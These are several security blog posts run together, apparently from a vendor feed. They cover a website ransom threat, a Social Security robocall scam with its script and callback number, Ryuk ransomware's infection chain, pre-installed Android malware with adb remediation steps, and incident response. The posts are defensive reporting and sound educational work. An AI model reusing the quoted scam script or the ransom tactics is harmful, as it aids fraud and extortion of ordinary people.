You didn’t reply.

The next time someone talks to you, press the reply button.

You must pay one bitcoin in five days. Otherwise I will publish all data and send emails to your users.

The message came with a Bitcoin address, and the defacement was quickly taken down.

Real threat or a blast of bluster?

Many observers questioned the legitimacy of this ransom threat. One Bitcoin is currently around 3,100 Euros. Luas aren’t exactly short of cash, so it wouldn’t be an issue for them to pay (not that we’d advise it). The general feeling was that either 3,100 Euros was a large sum of money to the attacker, or they just wanted the company to address the problem facing them without fuss.

As soon as the hack was announced, nervous customers wondered exactly what might be dumped into the ether should the ransom go unpaid. Names and addresses? Emails? Perhaps even payment data? However, this is where the hacker’s version of events starts to unravel. I’m not personally familiar with the website in question, and it’s currently still down, so I looked on Internet Archive.

A trip down memory lane

The site doesn’t appear to have any form of registration or login; it seems to be more of an information portal. Additionally, the one section that references payment—“Pay your standard fare notice”—leads to the payments site, which Luas pointed out hadn’t been compromised. The site read as follows:

The Luas website is undergoing restoration following a cyber-attack.

We wish to advise customers that the Tax Saver and Standard Fare Notice sites have NOT been compromised.

It’s worth noting the payments section hasn’t been taken offline, either.

The hacker who cried wolf?

We waited with baited breath as the ransom timer ticked down. Would we see a large blast of customer data popping up online? Or would the whole thing fall flat? If essential information such as logins and payment data hadn’t been grabbed, what exactly were we talking about here? Basic website metrics such as visitor stats or website referrers? What could this attacker possibly have grabbed while achieving what appears to have been a perfectly standard webpage defacement in all other respects?

The answer is, of course, “Nobody knows.”

The deadline has come, gone, and is now on vacation somewhere. Occasionally, it lets you know the weather is lovely and reminds you to put the bins out.

Absolutely none of which helps anybody who suspects they may have been caught up in this. Even more slightly surreal is the fact Luas said they’d contact anyone they thought may be affected, but there’s zero example of said contact on social media that I can find.

Customers: An update on the Luas cyberattack.

Luas technicians are still investigating it and are working to restore the site.

Luas has contacted the Commissioner for Data Protection and we have in accordance with best practice contacted everyone whose information may have been compromised.

This is absolutely not what normally happens, and at this point I’d usually be linking to a deluge of “you got me” posts. That’s the theory. The reality, currently, is nothing but a wave of silence.

This number is no longer available

Our suspicion here is that nothing customer related was taken and it was all a ransom-themed bluff to either grab some Bitcoin cash or attention, or perhaps both. If you’ve used any Luas site for any type of registration or payment, you’re probably fine.

Unless the site compromiser had a sudden change of heart, they were going to dump the data in public fashion instead of some hidden underground forum, but it hasn’t happened. People may call them “underground,” but the reality is data dumps don’t remain private for long.

No further updates are forthcoming from Luas, so it doesn’t appear they’ve been told their number is up either. All in all, we’d say cross some fingers and hope everything is coming up Milhouse.

While I try to remember if things coming up Milhouse is good or bad, here’s what you can do if you’re still worried you may be affected.

Data dump fallout tips

This isn’t just good advice for the Luas attack, but for any potential breach situation.

If you’re on Twitter, simply follow haveibeenpwned, a service maintained by security pro Troy Hunt. It will usually be one of the first places you’ll hear about any breach where data has been taken. After that, head over to the haveibeenpwned website and check if your emails have been included in any attacks. If they have, you’ll see a short summary of when it happened and what was taken. Note that you won’t see the stolen data.

Finally, you can register for alerts when any new breaches are added.

There’s really no need to go spelunking into the murky pools of hacker forums, looking in vain for a breach you may be on. Rest assured that if it’s happened, you’ll find out eventually—one way or another. At that point, it’s a case of changing your logins and applying whatever security steps are required to fix things up. Ransoms are always a major issue, whether from threats or infection files. If this story has any additional developments, we will of course update this post as to what anyone affected should do next.

The post Luas data ransom: the hacker who cried wolf? appeared first on Malwarebytes Labs.

Social Security Number scammers are at it again

The Federal Trade Commission (FTC) once again sounded the alarm in mid-December about the latest Social Security Number (SSN) scam that continues to affect thousands of Americans.

While most of us were only able to read about this type of scam in the past, the FTC now has an audio recording of an SSN scam robocall, which they released two weeks after the warning.

Play the audio below and familiarize yourselves with what an SSN scam sounds like. Take note of the sentence phrasing and the mild threat at the near end of the automated recording directed to those who aren’t motivated enough to call back the number it provided.

Transcription:

law enforcement agencies to suspend your Social Security number on an immediate basis, as we have received suspicious trails of information in your name. The moment you receive this message, I need you to get back to me on my department division toll-free number that is 1-888-952-5554. I repeat 1-888-952-5554. Verify the last four digits of your Social Security number when you call to better assist you with this issue. Now, if I don’t hear a call from you, we will have to issue an arrest warrant under your name and get you arrested. So, get back to me as soon as possible. Thank you.

This particular recording wasn’t specific about the “suspicious trails of information” they were referring to, but there have been reports to the FTC of scammers linking their target’s SSN to certain crimes they claim are taking place in Texas, such as illegally sending money outside of the country.

The FTC noted that the threat of individuals or groups pretending to be from the Social Security Administration (SSA) are growing at an exponential rate. In fact, there was a 994 percent increase in SSN scams reported to FTC—from 3,200 in 2017 to 35,000 in 2018.

Not just a numb3rs g4m3

One attribute that makes SSN scams successful (and makes one likely to be more accepting of calls) is the scammers’ use of technology to mimic the legitimate contact number of the Social Security Administration (SSA) so that appears in the caller ID when contacting targets. In this case, the scammers used 1-800-772-1213, the SSA’s national customer service number. Yet, SSN scams are more than just a numbers game.

Seeing red

To help clue you in on other tactics used by SSN scammers, below is a list of red flags or tactics these scammers practice that anyone with a Social Security Number should at least be familiar with:

  • The call comes out of nowhere—especially if you haven’t contacted the SSA first or you have no ongoing business with them, such as a pending Social Security Disability (SSD) application. If you do have a pending application with the SSA, an agent may call if the information in the application isn’t complete, answers on the form aren’t legible, or the agent has found some discrepancies between the information you provided in the application and the information they got from other Federal agencies. An SSA agent will only ask for your SSN if the one you provided is invalid or incorrect.
  • The purported SSA agent makes untruthful or worrying requests or claims, such as:
    • Your SSN is suspended because of crime-related links (such as what the robocaller claims in the recording above). Fact: Social Security numbers do not get suspended.
    • You need to “reactivate” your suspended SSN. Then, scammers either ask for more information or a fee to do this.
    • You need to pay for something immediately, like a debt (and they won’t allow you to appeal the amount you owe).
    • You need to send over your payment via a means they specify, such as the agent requiring you to pay using your prepaid debit card.
    • You need to provide a bank routing number or card details over the phone.
    • Your SSN is linked to malicious activities that will lead to your arrest or deportation.
    • The SSA system is down, so you need to provide the purported agent with your personal information, such as SSN, date of birth, mother’s maiden name, and bank information.

“SSA employees do contact citizens by telephone for customer-service purposes, and in some situations, an SSA employee may request the citizen confirm personal information over the phone,” writes Andrew Cannarsa, communications director for the Office of the Inspector General (OIG). “However, SSA employees will never threaten you for information or promise a Social Security benefit approval or increase in exchange for information. In those cases, the call is fraudulent.”

Just hang up

Hanging up is the best course of action when you deliberately or accidentally answered a call that you realized, at some point, appears scammy. When in doubt, assume it’s a scam. Besides, no one, not even the legitimate SSA, will penalize you for hanging up on them. Remember that when it comes to nipping scams in the bud, you are in control. End it before they can say another word.

Prevention, of course, is still key. Being able to catch the known red flags we have identified above and knowing what to do should you see a legitimate SSA number flash in the caller ID screen—whether you do or don’t have outstanding business with them—can minimize the risk.

Is the SSA calling? Don’t pick up the phone. Instead, call SSA via their consumer service number and ask if they have been trying to reach you.

Other scams related to SSN

Unfortunately, children and the deceased aren’t safe from fraudsters and identity thieves, either. Parents, make sure you find the time to check your kids’ credit scores to make sure that they remains untouched and are not being built up by someone else. If you see something’s wrong, or if you see signs of potential identity theft, go to this FTC page to read more.

Relatives of deceased loved ones should do credit checks every now and then as well. The Identity Theft Resource Center has useful material on how one can protect the deceased’s identity and other tips.

When it comes to scams, the following is always true: Does it seems suspicious or “off” in any way? If so, it probably is. Proceed with caution and guard your Social Security Number well.

The post Social Security Number scammers are at it again appeared first on Malwarebytes Labs.

Ryuk ransomware attacks businesses over the holidays

While families gathered for food and merriment on Christmas Eve, most businesses slumbered. Nothing was stirring, not even a mouse—or so they thought.

For those at Tribune Publishing and Data Resolution, however, a silent attack was slowly spreading through their networks, encrypting data and halting operations. And this attack was from a fairly new ransomware family called Ryuk.

Ryuk, which made its debut in August 2018, is different from many other ransomware families we’ve analyzed, not because of its capabilities, but because of the novel way it infects systems.

So let’s take a look at this elusive new threat. What is Ryuk? What makes it different from other ransomware attacks? And how can businesses stop it and similar threats in the future?

What is Ryuk?

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts.

Despite a successful infection run, Ryuk itself possesses functionality that you would see in a few other modern ransomware families. This includes the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By doing this, the attackers could disable the Windows System Restore option for users, and therefore make it impossible to recover from the attack without external backups.

Ryuk “polite” ransom note

One interesting aspect of this ransomware is that it drops more than one note on the system. The second note is written in a polite tone, similar to notes dropped by BitPaymer ransomware, which adds to the mystery.

Ryuk “not-so-polite” ransom note

Similarities with Hermes

Researchers at Checkpoint have already conducted deep analysis of this threat, and one of their findings was that Ryuk shares many similarities with another ransomware family: Hermes.

Inside of both Ryuk and Hermes, there are numerous instances of similar or identical code segments. In addition, several strings within Ryuk have been discovered that refer to Hermes—in two separate cases.

When launched, Ryuk will first look for the Hermes marker that is inserted into each encrypted file. This is a means to identify if the file or system has already been attacked and/or encrypted.

The other case involves whitelisted folders, and while not as damning as the first, the fact that both ransomware families whitelist certain folder names is another clue that the two families might share originators. For example, both Ryuk and Hermes whitelist a folder named “Ahnlab”, which is the name of a popular South Korean security software.

If you know your malware, you might remember that Hermes was attributed to the Lazarus group, who are associated with suspected North Korean nation-state operations. This has led many analysts and journalists to speculate that North Korea was behind this attack.

We’re not so sure about that.

Notable attacks

Multiple notable Ryuk attacks have occurred over the last few months primarily in the United States, in which the ransomware infected large numbers of endpoints and demanded higher ransoms than what we typically see (15 to 50 Bitcoins).

One such attack was on the Onslow Water and Sewer Authority (OWASA) on October 15, 2018, which kept the organization from being able to use their computers for a time. While water and sewage services, as well as customer data, were untouched by the ransomware attack, it still caused significant damage to the organization’s network and resulted in numerous databases and systems being rebuilt from the ground up.

Infection method

According to Checkpoint and multiple other analysts and researchers, Ryuk is spread as a secondary payload through botnets, such as TrickBot and Emotet.

Here is the running theory: Emotet makes the initial infection on the endpoint. It has its own abilities to spread laterally throughout the network, as well as launch its own malspam campaign from the infected endpoint, sending additional malware to other users on the same or different networks.

From there, the most common payload that we have seen Emotet drop over the last six months has been TrickBot. This malware has the capability to steal credentials, and also to move around the network laterally and spread in other ways.

Both TrickBot and Emotet have been used as information stealers, downloaders, and even worms based on their most recent functionality.

At some point, for reasons we will explore later in this post, TrickBot will download and drop Ryuk ransomware on the system, assuming that the infected network is something that the attackers want to ransom. Since we don’t see even a fraction of the number of Ryuk detections as we see of Emotet and TrickBot through our product telemetry, we can assume that it’s not the default standard operation to infect systems with Ryuk after a time, but rather something that is triggered by a human attacker behind the scenes.

Stats

Let’s take a look at the stats for Emotet, Ryuk, and TrickBot from August until present-day and see if we can’t identify a trend.

Malwarebytes’ detections from August 1, 2018 – January 2, 2019

The blue line represents Emotet, 2018’s biggest information-stealing Trojan. While this chart only shows us August onward, rest assured that for much of the year, Emotet was on the map. However, as we sailed into Q4 2018, it became a much bigger problem.

The orange line represents TrickBot. These detections are expected to be lower than Emotet, since Emotet is usually the primary payload. This means that in order for TrickBot to be detected, it must have either been delivered directly to an endpoint or dropped by an Emotet infection that was undetected by security software or deployed on a system without it. In addition, TrickBot hasn’t been the default payload for Emotet for the entire year, as the Trojan has continuously swapped payloads, depending on time of year and opportunity.

Based on this, to get hit with Ryuk (at least until we figure out the real intention here) you would need to have either disabled, not installed, or not updated your security software. You would need to refrain from conducting regular scans to identify TrickBot or Emotet. You would need to either have unpatched endpoints or weak credentials for TrickBot and Emotet to move laterally throughout the network and then, finally, you would need to be a target.

That being said, while our detections of Ryuk are small compared to the other families on this chart, that’s likely because we caught the infection during an earlier stage of the attack, and the circumstances for a Ryuk attack need to be just right—like Goldilocks’ porridge. Surprisingly enough, organizations have created the perfect environment for these threats to thrive. This may also be the reason behind the huge ransom payment, as fewer infections lead to fewer payouts.

Christmas campaign

While active earlier in the year, Ryuk didn’t make as many headlines as when it launched its “holiday campaign,” or rather the two largest sets of Ryuk infections, which happened around Christmastime.

The chart below shows our detection stats for Ryuk from the beginning of December until now, with the two infection spikes noted with stars.

Malwarebytes’ Ryuk detections December 5, 2018 – January 2, 2019

These spikes show that significant attacks occurred on December 24 and December 27.

Data Resolution attack

The first attack was on Dataresolution.net, a Cloud hosting provider, on Christmas Eve. As you can see from above, it was the most Ryuk we had detected in a single day over the last month.

According to Data Resolution, Ryuk was able to infect systems by using a compromised login account. From there, the malware gave control of the organization’s data center domain to the attackers until the whole network was shut down by Data Resolution.

The company assures customers that no user data was compromised, and the intent of the attack was to hijack, not steal. Although, knowing how this malware finds its way onto an endpoint in the first place is a good sign that they’ve probably lost at least some information.

Tribune Publishing attack

Our second star represents the December 27 attack, when multiple newsprint organizations under the Tribute Publishing umbrella (now or in the recent past) were hit with Ryuk ransomware, essentially disabling these organizations’ ability to print their own papers.

The attack was discovered late Thursday night, when one of the editors at the San Diego Union-Tribune was unable to send finished pages to the printing press. These issues have since been resolved.

Theories

We believe Ryuk is infecting systems using Emotet and TrickBot to distribute the ransomware. However, what’s unclear is why criminals would use this ransomware after an already-successful infection.

In this case, we can actually take a page from the Hermes playbook. We witnessed Hermes being used in Taiwan as a means to cover the tracks of another malware family already on the network. Is Ryuk being used in the same way?

Since Emotet and TrickBot are not state-sponsored malware, and they are usually automatically launched to a blanket of would-be victims (rather than identifying a target and being launched manually), it seems odd that Ryuk would be used in only a few cases to hide the infection. So perhaps we can rule this theory out.

A second, more probable theory is that the purpose of Ryuk is as a last ditch effort to extort more value from an already-juicy target.

Let’s say that the attackers behind Emotet and TrickBot have their bots map out networks to to identify a target organization. If the target has a large enough infection spread of Emotet/TrickBot, and/or if its operations are critical or valuable enough that disruption would trigger an inclination to pay the ransom, then that might make them the perfect target for a Ryuk infection.

The true intention for using this malware can only be speculated at this point. However, whether it’s hiding the tracks of other malware or simply looking for ways to make more cash after stealing all the relevant data they could, businesses should be wary of writing this one off.

The fact remains that there are thousands of active Emotet and TrickBot infections all over the world right now. Any of the organizations that are dealing with these threats need to take them seriously, because an information stealer might turn into nasty ransomware at any time. This is the truth of our modern threat landscape.

Attribution

As mentioned earlier, many analysts and journalists have decided that North Korea is the most likely attacker to be distributing Ryuk. While we can’t completely rule this out, we aren’t entirely sure it’s accurate.

Ryuk does match Hermes in many ways. Based on the strings found, it was likely built on top of, or is a modified version of Hermes. How the attackers got the source code is unknown, however, we have observed instances where criminals were selling versions of Hermes on hacker forums.

This introduces another potential reason the source code got into the hands of a different actor.

Identifying the attribution of this attack based on similarities between two families, one of which is associated with a known nation-state attack group (Lazarus) is a logical fallacy, as described by Robert M. Lee in a recent article, “Attribution is not Transitive – Tribute Publishing Cyber Attack as a Case Study.” The article takes a deeper dive into the errors of attribution based on flimsy evidence. We caution readers, journalists, and other analysts on drawing conclusions from correlations.

Protection

Now that we know how and potentially why Ryuk attacks businesses, how can we protect against this malware and others like it?

Let’s focus on specific technologies and operations that are proven effective against this threat.

Anti-exploit technology

The use of exploits for both infection and lateral movement has been increasing for years. The primary method of infection for Emotet at the moment is through spam with attached Office documents loaded with malicious scripts.

These malicious scripts are macros that, once the user clicks on “Enable content” (usually through some kind of social engineering trick), will launch additional scripts to cause havoc. We most commonly see scripts for JavaScript and PowerShell, with PowerShell quickly becoming the de-facto scripting language for infecting users.

While you can stop these threats by training users to recognize social engineering attempts or use an email protection platform that recognizes malicious spam, using anti-exploit technology can also block those malicious scripts from trying to install malware on the system.

In addition, using protection technologies, such as anti-ransomware add immense amounts of protection against ransomware infections, stopping them before they can do serious damage.

Regular, updated malware scans

This is a general rule that has been ignored enough times to be worth mentioning here. In order to have effective security solutions, they need to be used and updated frequently so they can recognize and block the latest threats.

In one case, the IT team of an organization didn’t even know they were lousy with Emotet infections until they had updated their security software. They had false confidence in a security solution that wasn’t fully armed with the tools to stop the threats. And because of that, they had a serious problem on their hands.

 

Network segmentation

This is a tactic that we have been recommending for years, especially when it comes to protecting against ransomware. To ensure that you don’t lose your mapped or networked drives and resources if a single endpoint gets infected, it’s a good idea to segment access to certain servers and files.

There are two ways to segment your network and reduce the damage from a ransomware attack. First, restrict access to certain mapped drives based on role requirements. Second, use a separate or third-party system for storing shared files and folders, such as Box or Dropbox.

Evolving threats

This last year has brought with it some novel approaches to causing disruption and devastation in the workplace. While ransomware was the deadliest malware for businesses in 2017, 2018 and beyond look to bring us multiple malware deployed in a single attack chain.

What’s more, families like Emotet and TrickBot continue to evolve their tactics, techniques, and capabilities, making them more dangerous with each new generation. While today, we might be worried about Emotet dropping Ryuk, tomorrow Emotet could simply act as ransomware itself. It’s up to businesses and security professionals to stay on top of emerging threats, however minor they may appear, as they often signal a change in the shape of things to come.

Thanks for reading and safe surfing!

The post Ryuk ransomware attacks businesses over the holidays appeared first on Malwarebytes Labs.

Server Security for the Modern IT Ecosystem

A Changing Landscape

In recent years we’ve seen a fundamental shift in the IT landscape, accelerated towards cloud and containerized infrastructures. According to Forbes, by 2020 it is predicted that 83 percent of enterprise workloads will be in the cloud. Moving beyond the cloud, software development teams are driving further change with the adoption of microservice architectures and containers, a market poised to grow over 40 percent year over year. The adoption of these new technologies signals a major change in IT infrastructures for modern enterprises. However, this transition is not always seamless, and it can be difficult to refactor legacy applications for a new technology stack. As a result, teams are building and deploying applications across a variety of environments, including physical machines, virtual machines, containers, and cloud infrastructures. While these new technologies offer great benefits in terms of agility, scalability, and continuous integration (CI)/continuous delivery (CD), they also add a layer of complexity to security that can expose the organization to vulnerabilities and threats. Overall, the combination of new application technology with existing legacy architectures and deployment models leads to greater IT complexity, making it extremely difficult to achieve consistent security across the organization.

A Growing Threat to Servers

Enterprise security has traditionally been thought of as primarily an endpoint issue, however, the modernization of the IT landscape is resulting in attacks from all directions. Servers have become an important target for cybercrime, with more than 145 million U.S. citizens having their data compromised by the Equifax server breach. In recent years, we’ve seen a number of high-profile server-targeted vulnerabilities. For example, the Equifax attack leveraged a server-side vulnerability in the Apache Struts web application framework, and Heartbleed directly targeted servers to reveal private data.

Servers are the workhorses of the IT environment, and server workloads have fundamentally different security requirements from traditional endpoint protection. As threats increase in sophistication, there is no single miracle fix to server protection. Rather, it requires multiple techniques through a layered security approach. Security and risk managers should utilize offerings dedicated to cloud workload protection, or cloud workload protection platforms (CWPP). As stated in Gartner’s 2018 Market Guide, “The market for cloud workload protection platforms (CWPPs) is defined by offerings specifically designed for server workload-centric security protection and are typically agent-based for deep workload visibility and attack prevention capabilities.”* 

Market-Leading Performance

Additionally, Trend Micro believes that the Deep Security™ platform meets many capabilities and architectural considerations listed in Gartner’s Market Guide for Cloud Workload Protection Platforms.

Deep Security offers recommendations through the following:

  • Seamless integration with leading environments, including AWS, Azure®, and VMware®
  • Complete visibility and protection of workloads
  • Automatic discovery and deployment of security controls
  • Security integrated with your DevOps team’s toolsets
  • Support for microservices architectures and Docker® container protection

This is all done with minimal impact on performance, allowing companies to maintain their agility without sacrificing security. Learn more about our Hybrid Cloud Security solutions, and contact us to discover what makes Trend Micro the number one provider of corporate server security.

Sources:
*Gartner, “Market Guide for Cloud Workload Protection Platforms”, Neil MacDonald, 26 March 2018 G00328483. 
451 Research’s Market Monitor: Cloud Enabling Technologies, Q3 2016
Trend Micro, “Critical Remote Code Execution Vulnerability (CVE-2018-11776) Found in Apache Struts”
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/critical-remote-code-execution-vulnerability-cve-2018-11776-found-in-apache-struts

The post Server Security for the Modern IT Ecosystem appeared first on .

The new landscape of pre-installed mobile malware: malicious code within

Here’s a scary thought: Mobile devices may soon come with pre-installed malware on required system apps. While it might sound like a grim foretelling, pre-installed mobile malware is an unfortunate reality of the future.

In the past, we’ve seen pre-installed malware with the notorious Adups threat, among others. “Pre-installed” means the malware comes already installed on a device at the system level, thus, it cannot be removed; only disabled. However, remediating these iterations of pre-installed malware is possible by using a work-around to uninstall apps for the current user. This method involves connecting the mobile device to a PC and using the ADB command line tool. Follow our guide, removal instructions for Adups, to find out more.

Although this method is a bit tedious, it works to remediate the malware. In contrast, remediating newer versions of pre-installed malware has become much more difficult. We are now seeing malware authors target system apps that are required for the device to function properly. By injecting malicious code within these necessary apps, threat actors have reshaped the landscape of pre-installed malware for the worse.

Types of pre-installed apps

There are two types of preinstalled apps, based on the apps’ location on the device. This location also determines the importance of the app.

The first location is /system/app/. Apps in this location are typically something you want to have, but not critical for the device to run. For example, apps that contain functionally for the camera, Bluetooth, FM radio on the device, or photo viewing are stored in this location. This location is also where device manufactures cache what some may consider bloatware. Uninstalling some of these apps may degrade the user experience, but it isn’t going to stop the device from functioning.

The other location is /system/priv-app/. This is where significantly important apps reside. For instance, apps like settings and system UI, which include the functionality for the back/home buttons on Android devices, are stored here. In other words, apps you absolutely cannot uninstall these without essentially breaking the phone. Sadly, the latest pre-installed malware is targeting this location.

The evidence

In the light of this new, frightening pre-installed malware, let’s look at two case studies.

Case study 1: Riskware auto installer within System UI

The device is a THL T9 Pro. The infection is Android/PUP.Riskware.Autoins.Fota.INS. Although the code looks similar to the well-known preinstalled malware Adups, it’s entangled within the critical system app System UI, instead of being in a standalone app like a UpgradeSys. The infection causes headaches, as it repeatedly installs variants of Android/Trojan.HiddenAds. It’s unknown if this is the doing of Adups themselves, or on the other hand, if code was taken from the Adups Auto Installer and inserted into System UI. Neither scenario is good.

Case Study 2: Monitor within settings

This time, the device is a UTOK Q55. The infection is Android/Monitor.Pipe.Settings. The category “Monitor” is a subset of Potentially Unwanted Programs (PUPs). As the name implies, Monitor apps collect and report sensitive information from the device. Furthermore, this particular Monitor app is hardcoded in the highly-important Settings app. In effect, the app used to uninstall other apps would need to be uninstalled itself to remediate—pure irony.

Attempting to remediate

Here lays the biggest problem with these infections—there is currently no good way to remediate. I have worked with several customers with these infections, but despite my attempts, I have yet to find a good work around. However, I can offer some guidance. If a clean version of the system app can be found to replace the malicious version, you might be able to replace it. You will want to look for system apps that match the current Android OS version of the device.  If found, you can try using the following method:

  • Read the disclaimer from the removal instructions for Adups.
  • Follow the steps under Restoring apps onto the device (without factory reset) in the removal instructions for Adups to save the proper <full path of the apk> of the system app to be replaced.
  • Download a clean version of the system app to your PC.
    • You can use the popular site VirusTotal to determine if it’s clean or not.
  • Move the system app from your PC to your device.
    • adb push <PC file path>\<filename of clean version.apk> /sdcard/Download/<filename of clean version.apk>
  • Uninstall the old, malicious version of the system app.
    • adb shell pm uninstall -k –user 0 <package name of malicious system app>
  • Install the new version of the system app.
    • adb shell pm install -r –user 0 /sdcard/Download/<filename of clean version.apk>
  • See if it works.
    • Common failure errors:
      • [INSTALL_FAILED_VERSION_DOWNGRADE]
      • [INSTALL_FAILED_UPDATE_INCOMPATIBLE]
      • [INSTALL_FAILED_OLDER_SDK]
    • If the new version fails to install, you can revert to the old system app.
      • adb shell pm install -r –user 0 <full path of the apk saved from second step>

As noted above, I have yet to find a version of any of the infections encountered that successfully installs. If you need assistance, feel free to post on our forum Mobile Malware Removal Help & Support.

What really can be done?

Currently, the best method to deal with these infections is to:

  1. Stay away from devices with these infections. Here are the manufacturers/models we have seen so far that have been impacted:
    • THL T9 Pro
    • UTOK Q55
    • BLU Studio G2 HD
  2. If you already bought one, return the device.
  3. If you already bought the device and can’t return it, contact the manufacturer.

Extreme frustration

As a mobile malware researcher, it pains me to no end to write about malware we can’t currently remediate.  However, the public needs to know that these types of infections exist in the wild. No one should have to tolerate such infections on any mobile device regardless of its price point and/or notoriety. I will continue to look for methods to deal with these infections. In the meantime, stay safe out there.

APK samples

Detection: Android/PUP.Riskware.Autoins.Fota.INS
MD5: 9E0BBF6D26B843FB8FE95FDAD582BB70
Package Name: com.android.systemui

Detection: Android/Monitor.Pipe.Settings
MD5: DC267F396FA6F06FC7F70CFE845B39D7
Package Name: com.android.settings

The post The new landscape of pre-installed mobile malware: malicious code within appeared first on Malwarebytes Labs.

Incident Response In The Public Eye

Cyberattacks happen constantly. Every day organizations are attackers online whether they realize it or not. Most of these attacks are passing affairs. The mere fact that systems are on to the internet makes them a target of opportunity. For the most part, these attacks are non-events.

Security software, bugs in attack code, and updated applications stop most attacks. With 20 billion+ devices connected to the internet, it’s easy enough for the attack to move on.

But every couple of weeks there is a big enough attack to draw headlines. You’ve seen a steady stream of them over the past few years. 10 million records here, thousands of systems there, and so on.

When we talk about these attacks, for most people, it’s an abstract discussion. It’s hard to visualize an abstract set of data that lives online somewhere.

The recent attack on the Tribune Publishing network is different. This attack had a real world impact. Around the United States, newspapers arrived late and missing significant sections of content.

Timeline

Late Thursday, some systems on the Tribune Publishing network were inaccessible. This is not an uncommon experience for anyone working in a large organization.

Technology has brought about many wonders but reliability isn’t typically one of them. When a system is inaccessible, it’s not out of the question to first think, “Ugh, this isn’t working. Call IT.”

Support tickets are often the first place cyberattacks show up…in retrospect. All public signs in the Tribune Publishing attack point this way. Once support realized the extent of the issue and that it involved malware, the event—a support request—turned into an incident. This kicks off an incident response (IR) process.

It’s this process that the teams at Tribune Publishing are dealing with now.

Whodunnit?

“Who is behind the attack?” Is the first question on everyone’s mind. It’s human nature—doubly so at a media organization—to want to understand the “who” and “why” as opposed to the “how”.

The reality is that for the incident response process, that’s a question that wastes time. The goal of the incident response process is to limit damage to the organization and to restore systems as fast as possible.

In that context, the response team only needs to roughly classify their attacker. Is the attacker:

  1. A low level cybercriminal who got lucky with an automated attack and has few resources to continue or sustain the attack?
  2. A cybercriminal intending on attacking a specific class of organization or systems?
  3. A cybercriminal targeting your organization?

Knowing which class of cybercriminal is behind the attack will help dictate the effort required in your response.

For a simple attack, your automated defences should take care of it. Even after an initial infection, a defence in depth strategy will isolate the attack and make recovery straight forward.

If the attack is part of a larger campaign (e.g., WannaCry, NotPeyta, etc.), incident response is more complex but the same principles hold true. The third class of attacker—specifically targeting your organization—is what causes a change in the process. Now you are defending against an adversary who is actively changing their approach. That requires a completely different mindset compared to other responses.

The Process

Incident response processes generally follow six stages:

  1. Prepare
  2. Identify
  3. Contain
  4. Eradicate
  5. Recover
  6. Learn

On paper the process looks simple. Preparation begins with teams gathering contact information, tools, and by writing out—or better yet, automating—procedures.

Once an incident has started, teams work to identify affected systems and the type of attack. They then contain the attack to prevent it from spreading. Then work to eradicate any trace of the attack.

Once the attack is over, the work shifts to recovering systems and data to restore functionality. Afterwards, an orderly review is conducted and lessons are shared about what worked and what didn’t.

Easy, right?

Any incident responders reading this post, can take a minute here having enjoyed a good laugh. The next section slams everyone back to the harsh reality of IR.

Reality

The six phases of incident response look great on paper but when you’re faced with implementing them in the real world, things never work out so cleanly.

The majority of a response is spent stuck in a near endless loop. Identifying new areas of compromises to try to contain the attack. Hopefully allowing responders to eradicate any foothold to recover the affected systems.

This is what most organizations struggle with. The time spent preparing is often insufficient because it’s all theoretical. Combined with the rapid pace of change on the network means that teams are struggling to keep up during an active incident.

With an organization like Tribune Publishing, things are even more difficult. By it’s very nature, it’s a 24/7 business with a wide variety of users around the country. This means there are a lot of systems to consider and each hour of downtime has a very real and significant impact on the bottom line.

As the incident progresses, the response team will make critical decision after critical decision. Shutting down various internal services to protect them. Changing network structures to isolate malicious activity. And a host of other challenges will pop up during the incident.

It’s difficult, hard driving work. Made doubly so with the eyes of senior management, customers, and the general public looking on.

Focus

As a CISO or incident response team leader, you need to focus on the IR process, not on attribution. That’s why it’s worrisome to see early attribution during an incident.

In the Tribune Publishing attack, it was publicly reported that the attack came from outside of the United State. This led to speculation around motivation. It’s likely that statement was based on the malware reportedly found and simple IP address information.

Early in the IR process, evidence like this will be found. It’s easily accessible but also highly unreliable. Malware is often sold in the digital underground and IP addresses are easily spoofed or proxied. The response team knows this but pressure from higher up may demand some form of answer…whether or not it helps resolve the situation.

The team must stay focused on resolving the incident, not spending valuable time and energy getting side tracked. Attribution has its place. It’s definitely not in the middle of the response to an incident.

Practice

The one hard truth of incident response is that nothing can substitute for experience. Given the—hopefully obvious—fact that you don’t actually want to be attacked, this leads to the concept of a game day or an active simulation.

Popular in cloud environments—AWS runs game days at their events—these exercises provide hands on experience. Usually held for the operations team, they are are of critical importance to the security team as well.

Security doesn’t operate in a vacuum, especially during an incident. Working with other teams during an incident is key. Practicing that way is a must. This type of work is a huge effort but one that will pay off significant when an organization is attacked.

Next Steps

Tribune Publishing was hit by a cyberattack with real world impact. This level of visibility is a stark reminder of how challenging these situations can be. The most critical phase of incident response is the first one: preparation.

As a CISO or senior security team member, you need to prepare not only the incident response plan. With a plan in hand, you need to get other teams on board and make it clear to senior management how this process works. Critical to success is making sure that management knows that the priority is recovery…not attribution.

Combine that with a lot of practice and when the next incident hits, you’ll have put your team in a reasonable position to respond and recover quickly.

The post Incident Response In The Public Eye appeared first on .

Dancho Danchev’s Threat Data – How to Request Free Access Including a Christmas Discount

Dear blog readers, I wanted to let everyone know that I'm currently offering unlimited and exclusive access to Threat Data - The World's Most Comprehensive Threats Database in the true spirit of the Christmas seasons to selected set of individuals and organizations that approach me at dancho.danchev@hush.com Key Summary Points: - the platform basically represents the majority of proprietary

126 Arrests: The Emergence of India’s Cyber Crime Detectives Fighting Call Center Scams

The Times of India reports that police have raided a call center in Noida Sector 63 where hundreds of fraud calls were placed every day to Americans and Canadians resulting in the theft of $50,000 per day.

 The scammers had rented four floors of a building being operated by two scammers from Gurgaon, Narendra Pahuja and Jimmy Ashija. Their boss, who was not named by the police, allegedly operates at least five call centers. In the raid this week, 126 employees were arrested and police seized 312 workstations, as well as Rs 20 lakh in cash (about $28,500 USD).

Times of India photo 


Noida police have been cooperating very well with international authorities, as well as Microsoft, leading to more than 200 people arrested in Noida and "scores" of fake call centers shut down, including four in Sector 63.  (In a case just last month, another call center was said to have stolen from 300 victims, after using online job sites Shine.com and VintechJobs.com to recruit young money seekers by having them work conducting the scams. )

In the current scam, callers already had possession of the victim's Social Security Number and full name.  This information was used to add authority to their request, which got really shady really fast.  The victim was instructed to purchase Apple iTunes Gift Cards, or Google Play Gift Cards, scratch the numbers, and read them to the call center employee.  The money was laundered through a variety of businesses in China and India before cashing out to bank accounts belonging to Pahuja and Ashija.

 Go to Tweet
